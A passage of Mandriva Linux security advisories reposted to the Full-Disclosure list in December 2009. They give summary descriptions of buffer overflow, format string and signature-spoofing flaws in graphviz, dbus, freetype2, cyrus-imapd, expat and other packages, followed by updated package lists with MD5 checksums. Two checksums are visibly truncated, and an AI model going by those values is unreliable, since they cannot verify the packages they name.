2008.0/i586/libmagick10.7.0-devel-6.3.2.9-10.3mdv2008.0.i586.rpm 5dde39fb31d70d8b20ce9b17e4baf457 2008.0/i586/perl-Image-Magick-6.3.2.9-10.3mdv2008.0.i586.rpm 4dd3532a6395bfbf5faa1e99207e016f 2008.0/SRPMS/imagemagick-6.3.2.9-10.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: eac3f25719308817fae16f61b884fdd1 2008.0/x86_64/imagemagick-6.3.2.9-10.3mdv2008.0.x86_64.rpm 64b28aeaff64cdf08995bdc48b8af531 2008.0/x86_64/imagemagick-desktop-6.3.2.9-10.3mdv2008.0.x86_64.rpm 0fb0ab2f564fca7d63030c42e73757c3 2008.0/x86_64/imagemagick-doc-6.3.2.9-10.3mdv2008.0.x86_64.rpm 51735dba9c7ffb6cbfb4b32fc4bcd02b 2008.0/x86_64/lib64magick10.7.0-6.3.2.9-10.3mdv2008.0.x86_64.rpm ae9e8d6f4dc0422a86314ed0ba07d05e 2008.0/x86_64/lib64magick10.7.0-devel-6.3.2.9-10.3mdv2008.0.x86_64.rpm 96ca02b20d2340f94cd1a23a08d905af 2008.0/x86_64/perl-Image-Magick-6.3.2.9-10.3mdv2008.0.x86_64.rpm 4dd3532a6395bfbf5faa1e99207e016f 2008.0/SRPMS/imagemagick-6.3.2.9-10.3mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGmb3mqjQ0CJFipgRAjwqAJ9GvZyZxXOJOp3BqV3WFU/6pV4QvwCg6NgS lzaRj3WCRvkJgfuD/dWac4I= =4m8v -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:254-1 ] graphviz
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:254-1 http://www.mandriva.com/security/ ___ Package : graphviz Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: A vulnerability was discovered and corrected in graphviz: Stack-based buffer overflow in the push_subg function in parser.y (lib/graph/parser.c) in Graphviz 2.20.2, and possibly earlier versions, allows user-assisted remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a DOT file with a large number of Agraph_t elements (CVE-2008-4555). This update provides a fix for this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4555 ___ Updated Packages: Mandriva Linux 2008.0: 66513a7de994941334cb9978ef45b7d4 2008.0/i586/graphviz-2.12-6.1mdv2008.0.i586.rpm 15389ed7995925ff6259431515b243a2 2008.0/i586/graphviz-doc-2.12-6.1mdv2008.0.i586.rpm b396a868cf088e657346e71b031f44e4 2008.0/i586/libgraphviz3-2.12-6.1mdv2008.0.i586.rpm 1425b473e0dedb8c932789d650e0c422 2008.0/i586/libgraphviz-devel-2.12-6.1mdv2008.0.i586.rpm 688e71bbf9e31c4dabcb949cf837d7db 2008.0/i586/libgraphvizlua0-2.12-6.1mdv2008.0.i586.rpm 4951fc7c6b55c6bd1d43ad155f8237de 2008.0/i586/libgraphvizperl0-2.12-6.1mdv2008.0.i586.rpm 05909fd4aab2819a71b34a6c2f3a3fc8 2008.0/i586/libgraphvizphp0-2.12-6.1mdv2008.0.i586.rpm d4592f3bc8999d959b2ed6aa876dbc68 2008.0/i586/libgraphvizpython0-2.12-6.1mdv2008.0.i586.rpm 97c611b99148ce0dcde376848d934242 2008.0/i586/libgraphvizruby0-2.12-6.1mdv2008.0.i586.rpm 9c380373a067793f37f79d90bd0c3748 2008.0/i586/libgraphviz-static-devel-2.12-6.1mdv2008.0.i586.rpm d83afe7a2cbbf72d495b231bdf6c64ab 2008.0/i586/libgraphviztcl0-2.12-6.1mdv2008.0.i586.rpm fea4aca29cfaaceffc5f99ffd3e6e52e 2008.0/SRPMS/graphviz-2.12-6.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: e0cd3f43cd6022b37c65b32a44edcbec 2008.0/x86_64/graphviz-2.12-6.1mdv2008.0.x86_64.rpm 1c297b2eaadcd86a12ddbe010868be62 2008.0/x86_64/graphviz-doc-2.12-6.1mdv2008.0.x86_64.rpm 2d4f853e7e19d0b6adbe2daa91c0ae25 2008.0/x86_64/lib64graphviz3-2.12-6.1mdv2008.0.x86_64.rpm 50d617d1c796dd1a09c551b95246eb1f 2008.0/x86_64/lib64graphviz-devel-2.12-6.1mdv2008.0.x86_64.rpm ef79a36bba2c3591dab7b6eb49ac7079 2008.0/x86_64/lib64graphvizlua0-2.12-6.1mdv2008.0.x86_64.rpm 7584dd077e94340d5fbb70a01d67e256 2008.0/x86_64/lib64graphvizperl0-2.12-6.1mdv2008.0.x86_64.rpm 37cc9f451193e4cf3160169890c43fa5 2008.0/x86_64/lib64graphvizphp0-2.12-6.1mdv2008.0.x86_64.rpm d7c0a823e05da80dc2686d08573157b3 2008.0/x86_64/lib64graphvizpython0-2.12-6.1mdv2008.0.x86_64.rpm b6c220c08353bc544a1f51d9dd722277 2008.0/x86_64/lib64graphvizruby0-2.12-6.1mdv2008.0.x86_64.rpm ce066b8e7d6906cf5010b6f7ce795246 2008.0/x86_64/lib64graphviz-static-devel-2.12-6.1mdv2008.0.x86_64.rpm 7f13f94606b95405faca672feea36f16 2008.0/x86_64/lib64graphviztcl0-2.12-6.1mdv2008.0.x86_64.rpm fea4aca29cfaaceffc5f99ffd3e6e52e 2008.0/SRPMS/graphviz-2.12-6.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGmTmmqjQ0CJFipgRAvUIAKCUvzm24mw9PvCsXoDnW5mfvqpBOgCfYpQD 52KII6WS0xXBcNmzCerF8Vo= =MDeI -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:256-1 ] dbus
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:256-1 http://www.mandriva.com/security/ ___ Package : dbus Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: A vulnerability was discovered and corrected in dbus: The _dbus_validate_signature_with_reason function (dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic to validate a basic type, which allows remote attackers to spoof a signature via a crafted key. NOTE: this is due to an incorrect fix for CVE-2008-3834 (CVE-2009-1189). This update provides a fix for this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1189 ___ Updated Packages: Mandriva Linux 2008.0: f6f698df9a6c96f40da512b22d24f8bb 2008.0/i586/dbus-1.0.2-10.4mdv2008.0.i586.rpm 624b6fc20eea9f20a7d37082dc11fb08 2008.0/i586/dbus-x11-1.0.2-10.4mdv2008.0.i586.rpm b86eaa6581bf1a7922eb688e81530bf2 2008.0/i586/libdbus-1_3-1.0.2-10.4mdv2008.0.i586.rpm c9c2d25d13d1ebc5c4be9c742336a513 2008.0/i586/libdbus-1_3-devel-1.0.2-10.4mdv2008.0.i586.rpm 9c8c7a0733cba7e36624deb5a9328401 2008.0/SRPMS/dbus-1.0.2-10.4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 4d553999e6e34391b85953fedba7b051 2008.0/x86_64/dbus-1.0.2-10.4mdv2008.0.x86_64.rpm af7e3a9c174f96f25861ed4f82628927 2008.0/x86_64/dbus-x11-1.0.2-10.4mdv2008.0.x86_64.rpm 471b586bb2c1b2c6615b7eeb9243a50e 2008.0/x86_64/lib64dbus-1_3-1.0.2-10.4mdv2008.0.x86_64.rpm 5969a7c3e9310fbbde6842ed54d209df 2008.0/x86_64/lib64dbus-1_3-devel-1.0.2-10.4mdv2008.0.x86_64.rpm 9c8c7a0733cba7e36624deb5a9328401 2008.0/SRPMS/dbus-1.0.2-10.4mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGmIxmqjQ0CJFipgRAiNjAJ96Osr3StLyN0FMfiFcWCm2GudN0QCgzZyz QM6afX8rbxlVIOI+USTtgj4= =3r06 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:249-1 ] newt
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:249-1 http://www.mandriva.com/security/ ___ Package : newt Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: A vulnerability was discovered and corrected in newt: A heap-based buffer overflow flaw was found in the way newt processes content that is to be displayed in a text dialog box. A local attacker could issue a specially-crafted text dialog box display request (direct or via a custom application), leading to a denial of service (application crash) or, potentially, arbitrary code execution with the privileges of the user running the application using the newt library (CVE-2009-2905). This update provides a solution to this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2905 ___ Updated Packages: Mandriva Linux 2008.0: 654a1c3c587c6a5a14e6f4d23e890483 2008.0/i586/libnewt0.52-0.52.6-3.1mdv2008.0.i586.rpm f0942a5df8fa536a02126f4034d3e53f 2008.0/i586/libnewt0.52-devel-0.52.6-3.1mdv2008.0.i586.rpm 0ce830ecabb85460249e58f53d1fe2c9 2008.0/i586/newt-0.52.6-3.1mdv2008.0.i586.rpm 228d192869250f150207ce14e8374fec 2008.0/SRPMS/newt-0.52.6-3.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 889b8c64d20e91ae4e05d0c7945cd45e 2008.0/x86_64/lib64newt0.52-0.52.6-3.1mdv2008.0.x86_64.rpm 57e8e2c4cffe147722dbc4a0054459c9 2008.0/x86_64/lib64newt0.52-devel-0.52.6-3.1mdv2008.0.x86_64.rpm d960d8c779078deea2e6c33b70b9685d 2008.0/x86_64/newt-0.52.6-3.1mdv2008.0.x86_64.rpm 228d192869250f150207ce14e8374fec 2008.0/SRPMS/newt-0.52.6-3.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGl7ZmqjQ0CJFipgRAnviAJ9auPOyGciiDPdEAd6yvoiZKNlcZQCfWw8B UPOkLw5FvPeXtYNk1GTBBeU= =VpMX -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:243-2 ] freetype2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:243-2 http://www.mandriva.com/security/ ___ Package : freetype2 Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: Multiple integer overflows in FreeType 2.3.9 and earlier allow remote attackers to execute arbitrary code via vectors related to large values in certain inputs in (1) smooth/ftsmooth.c, (2) sfnt/ttcmap.c, and (3) cff/cffload.c. This update corrects the problem. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0946 ___ Updated Packages: Mandriva Linux 2008.0: ab2bab7fe8862cb5b34eb29d1da21ae5 2008.0/i586/libfreetype6-2.3.5-2.2mdv2008.0.i586.rpm db8544957e7dcc76329dc2912c579a78 2008.0/i586/libfreetype6-devel-2.3.5-2.2mdv2008.0.i586.rpm 69b7be3a3db9012d32b447c15d8831a1 2008.0/i586/libfreetype6-static-devel-2.3.5-2.2mdv2008.0.i586.rpm a41065d92d040af4b20af46eefb69451 2008.0/SRPMS/freetype2-2.3.5-2.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: d37a6e8aef8d356c70441b414b848121 2008.0/x86_64/lib64freetype6-2.3.5-2.2mdv2008.0.x86_64.rpm 8401b1d160bf2e326c26a3d7602ff650 2008.0/x86_64/lib64freetype6-devel-2.3.5-2.2mdv2008.0.x86_64.rpm ee316bce2591abed02cbb594a01d17f1 2008.0/x86_64/lib64freetype6-static-devel-2.3.5-2.2mdv2008.0.x86_64.rpm a41065d92d040af4b20af46eefb69451 2008.0/SRPMS/freetype2-2.3.5-2.2mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGlqxmqjQ0CJFipgRAu8vAJsFxX4MxG1u/B1wZFznf/MzBcUuOQCgwhTH MxHwekRBqWMDO7qZg672zBE= =4BOY -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:234-2 ] silc-toolkit
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:234-2 http://www.mandriva.com/security/ ___ Package : silc-toolkit Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: Multiple vulnerabilities was discovered and corrected in silc-toolkit: Multiple format string vulnerabilities in lib/silcclient/client_entry.c in Secure Internet Live Conferencing (SILC) Toolkit before 1.1.10, and SILC Client before 1.1.8, allow remote attackers to execute arbitrary code via format string specifiers in a nickname field, related to the (1) silc_client_add_client, (2) silc_client_update_client, and (3) silc_client_nickname_format functions (CVE-2009-3051). The silc_asn1_encoder function in lib/silcasn1/silcasn1_encode.c in Secure Internet Live Conferencing (SILC) Toolkit before 1.1.8 allows remote attackers to overwrite a stack location and possibly execute arbitrary code via a crafted OID value, related to incorrect use of a %lu format string (CVE-2008-7159). The silc_http_server_parse function in lib/silchttp/silchttpserver.c in the internal HTTP server in silcd in Secure Internet Live Conferencing (SILC) Toolkit before 1.1.9 allows remote attackers to overwrite a stack location and possibly execute arbitrary code via a crafted Content-Length header, related to incorrect use of a %lu format string (CVE-2008-7160). Multiple format string vulnerabilities in lib/silcclient/command.c in Secure Internet Live Conferencing (SILC) Toolkit before 1.1.10, and SILC Client 1.1.8 and earlier, allow remote attackers to execute arbitrary code via format string specifiers in a channel name, related to (1) silc_client_command_topic, (2) silc_client_command_kick, (3) silc_client_command_leave, and (4) silc_client_command_users (CVE-2009-3163). This update provides a solution to these vulnerabilities. Update: Packages for MES5 was not provided previousely, this update addresses this problem. Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3051 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7159 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3163 ___ Updated Packages: Mandriva Linux 2008.0: 4deec485d40326e0739b7da3998787ed 2008.0/i586/libsilc-1.1_2-1.1.2-2.2mdv2008.0.i586.rpm c3e7b417ad4cbb458e099794cab7405a 2008.0/i586/libsilcclient-1.1_2-1.1.2-2.2mdv2008.0.i586.rpm 826d5dca12e52f0f85dad21c940a 2008.0/i586/silc-toolkit-1.1.2-2.2mdv2008.0.i586.rpm e5b0fda04c3caa276f3b1756ac838c89 2008.0/i586/silc-toolkit-devel-1.1.2-2.2mdv2008.0.i586.rpm 4901eb44eaf1632da20c1e460b23edbc 2008.0/SRPMS/silc-toolkit-1.1.2-2.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 9ee2ebe46efbfc9ae9254dd37312dd69 2008.0/x86_64/lib64silc-1.1_2-1.1.2-2.2mdv2008.0.x86_64.rpm 351348a77adbcc686df498b9164ffe0c 2008.0/x86_64/lib64silcclient-1.1_2-1.1.2-2.2mdv2008.0.x86_64.rpm 995aabe91251d812e5b4aa86e5d3e775 2008.0/x86_64/silc-toolkit-1.1.2-2.2mdv2008.0.x86_64.rpm a93052fa1de76316511e1867b7295f47 2008.0/x86_64/silc-toolkit-devel-1.1.2-2.2mdv2008.0.x86_64.rpm 4901eb44eaf1632da20c1e460b23edbc 2008.0/SRPMS/silc-toolkit-1.1.2-2.2mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGliNmqjQ0CJFipgRAv2NAJ9ho45f9nXQXjhaOUYkocOFXGqXGQCfYoxe RO+f4vxtTC4S5YY634y79tY= =uMX1 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:229-1 ] cyrus-imapd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:229-1 http://www.mandriva.com/security/ ___ Package : cyrus-imapd Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: A vulnerability has been found and corrected in cyrus-imapd: Buffer overflow in the SIEVE script component (sieve/script.c) in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14 allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error (CVE-2009-2632). This update provides a solution to this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2632 ___ Updated Packages: Mandriva Linux 2008.0: 3624587d9792be346e43e89fdefca08f 2008.0/i586/cyrus-imapd-2.3.8-4.1mdv2008.0.i586.rpm 964fdf726329871c4cce92f11da00692 2008.0/i586/cyrus-imapd-devel-2.3.8-4.1mdv2008.0.i586.rpm 5fd6c344a226014105f01cec643fc24f 2008.0/i586/cyrus-imapd-murder-2.3.8-4.1mdv2008.0.i586.rpm 07ed14c27d7cbf32ca9fe1a16a244907 2008.0/i586/cyrus-imapd-nntp-2.3.8-4.1mdv2008.0.i586.rpm 8a0b889b937ea0e4bb2082979c17 2008.0/i586/cyrus-imapd-utils-2.3.8-4.1mdv2008.0.i586.rpm 86f444535a86d7fb3f608e2c7612df75 2008.0/i586/perl-Cyrus-2.3.8-4.1mdv2008.0.i586.rpm 5b9213e9db4ccc29efe4c5c389436aaf 2008.0/SRPMS/cyrus-imapd-2.3.8-4.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: d6efe505d3695fc96ca96c6a1e43b01a 2008.0/x86_64/cyrus-imapd-2.3.8-4.1mdv2008.0.x86_64.rpm 08759474f31a25d5b48179cabccc873e 2008.0/x86_64/cyrus-imapd-devel-2.3.8-4.1mdv2008.0.x86_64.rpm 029231ca655d20e016146f1b5988f4c8 2008.0/x86_64/cyrus-imapd-murder-2.3.8-4.1mdv2008.0.x86_64.rpm 1573bb824fa3d2747b7bf5ed64034ba8 2008.0/x86_64/cyrus-imapd-nntp-2.3.8-4.1mdv2008.0.x86_64.rpm ff36f2669c5007afc4b232ac9ed59d83 2008.0/x86_64/cyrus-imapd-utils-2.3.8-4.1mdv2008.0.x86_64.rpm ff65dff0ef99b87e81b52a9e4946658f 2008.0/x86_64/perl-Cyrus-2.3.8-4.1mdv2008.0.x86_64.rpm 5b9213e9db4ccc29efe4c5c389436aaf 2008.0/SRPMS/cyrus-imapd-2.3.8-4.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGlX9mqjQ0CJFipgRAiZAAJ90vfOd0KH1OlBegEA29vg98+Ga5ACffAgl VP8ROOVBxJt907M/TP1pD2I= =VOgd -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:232-1 ] libsamplerate
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:232-1 http://www.mandriva.com/security/ ___ Package : libsamplerate Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: A security vulnerability has been identified and fixed in libsamplerate: Lev Givon discovered a buffer overflow in libsamplerate that could lead to a segfault with specially crafted python code. This problem has been fixed with libsamplerate-0.1.7 but older versions are affected. This update provides a solution to this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: https://qa.mandriva.com/47888 ___ Updated Packages: Mandriva Linux 2008.0: 290f0033591de0cc95c750835258bad0 2008.0/i586/libsamplerate0-0.1.3-0.pre6.3.2mdv2008.0.i586.rpm 557bcf34b3450007c4ffb8671a6e3d2b 2008.0/i586/libsamplerate-devel-0.1.3-0.pre6.3.2mdv2008.0.i586.rpm 26264fd8df3e45c60dd7581db76206c6 2008.0/i586/libsamplerate-progs-0.1.3-0.pre6.3.2mdv2008.0.i586.rpm be95453f0805615f1dbde56ae4563ae6 2008.0/SRPMS/libsamplerate-0.1.3-0.pre6.3.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: fdb95011f55dea45e840374777aa2b99 2008.0/x86_64/lib64samplerate0-0.1.3-0.pre6.3.2mdv2008.0.x86_64.rpm 87de9f39334ef5a34e6e9d28ae8eba08 2008.0/x86_64/lib64samplerate-devel-0.1.3-0.pre6.3.2mdv2008.0.x86_64.rpm 7b88ed9ce39522a38c20f9d501edc58b 2008.0/x86_64/libsamplerate-progs-0.1.3-0.pre6.3.2mdv2008.0.x86_64.rpm be95453f0805615f1dbde56ae4563ae6 2008.0/SRPMS/libsamplerate-0.1.3-0.pre6.3.2mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGlONmqjQ0CJFipgRAgRXAKC9yC0sbyZMa/n1PWFqRYdGoDAXNACgwJpY hf8Xa7tj+kfTCQvF7m9GMVk= =DfQA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:316 ] expat
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:316 http://www.mandriva.com/security/ ___ Package : expat Date: December 5, 2009 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0, Enterprise Server 5.0, Multi Network Firewall 2.0 ___ Problem Description: A vulnerability has been found and corrected in expat: The big2_toUtf8 function in lib/xmltok.c in libexpat in Expat 2.0.1, as used in the XML-Twig module for Perl, allows context-dependent attackers to cause a denial of service (application crash) via an XML document with malformed UTF-8 sequences that trigger a buffer over-read, related to the doProlog function in lib/xmlparse.c, a different vulnerability than CVE-2009-2625 and CVE-2009-3720 (CVE-2009-3560). Packages for 2008.0 are being provided due to extended support for Corporate products. This update provides a solution to these vulnerabilities. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560 ___ Updated Packages: Mandriva Linux 2008.0: 9108b905fb1da6ed2fa0f83a0c386641 2008.0/i586/expat-2.0.1-4.2mdv2008.0.i586.rpm f204a06346e382581b0d3f3301ffadd3 2008.0/i586/libexpat1-2.0.1-4.2mdv2008.0.i586.rpm ab9269a6452f0191d17b88a7cae90949 2008.0/i586/libexpat1-devel-2.0.1-4.2mdv2008.0.i586.rpm 6363348acd6f5f6f0fa5c4aa61a6ebbd 2008.0/SRPMS/expat-2.0.1-4.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 03e2988fe55ecd7c7888cdb87ca9e779 2008.0/x86_64/expat-2.0.1-4.2mdv2008.0.x86_64.rpm 8322f60c8e9ac7f21243b220951d52ec 2008.0/x86_64/lib64expat1-2.0.1-4.2mdv2008.0.x86_64.rpm 7433c14fc17e7c5eaf177c002cc1d75c 2008.0/x86_64/lib64expat1-devel-2.0.1-4.2mdv2008.0.x86_64.rpm 6363348acd6f5f6f0fa5c4aa61a6ebbd 2008.0/SRPMS/expat-2.0.1-4.2mdv2008.0.src.rpm Mandriva Linux 2009.0: a3406f038312e930bcf6e37591cf872a 2009.0/i586/expat-2.0.1-7.2mdv2009.0.i586.rpm 15a6e0faa82f77c0a29b9db9abbb8930 2009.0/i586/libexpat1-2.0.1-7.2mdv2009.0.i586.rpm 7d6e768b90064aed25977f3fa66a86a8 2009.0/i586/libexpat1-devel-2.0.1-7.2mdv2009.0.i586.rpm 778a521e0fe9de8444aebbea544aaceb 2009.0/SRPMS/expat-2.0.1-7.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 7cffc848d7c1018ef8cf2f6ead9c56c7 2009.0/x86_64/expat-2.0.1-7.2mdv2009.0.x86_64.rpm 314b0c2ee406f43fa2d48edccb40465d 2009.0/x86_64/lib64expat1-2.0.1-7.2mdv2009.0.x86_64.rpm eeda32bc03d649fe1c1975433532c78d 2009.0/x86_64/lib64expat1-devel-2.0.1-7.2mdv2009.0.x86_64.rpm 778a521e0fe9de8444aebbea544aaceb 2009.0/SRPMS/expat-2.0.1-7.2mdv2009.0.src.rpm Mandriva Linux 2009.1: 1700ce9cfb27620758d354d996433e76 2009.1/i586/expat-2.0.1-8.2mdv2009.1.i586.rpm 517a6e6356a1fc05cea9a7a473ccfd61 2009.1/i586/libexpat1-2.0.1-8.2mdv2009.1.i586.rpm 38d04bf472e9d4008fb636149d25fbeb 2009.1/i586/libexpat1-devel-2.0.1-8.2mdv2009.1.i586.rpm 3e6ab6cdb43fff3547b4f24aab4ec82b 2009.1/SRPMS/expat-2.0.1-8.2mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 0c0b11d85cac8a9f3da701e452acb6ad 2009.1/x86_64/expat-2.0.1-8.2mdv2009.1.x86_64.rpm ac3512d4f42111bbee9987c5c93c7005 2009.1/x86_64/lib64expat1-2.0.1-8.2mdv2009.1.x86_64.rpm fd409ba4722686326c9fe1d9db3ead42 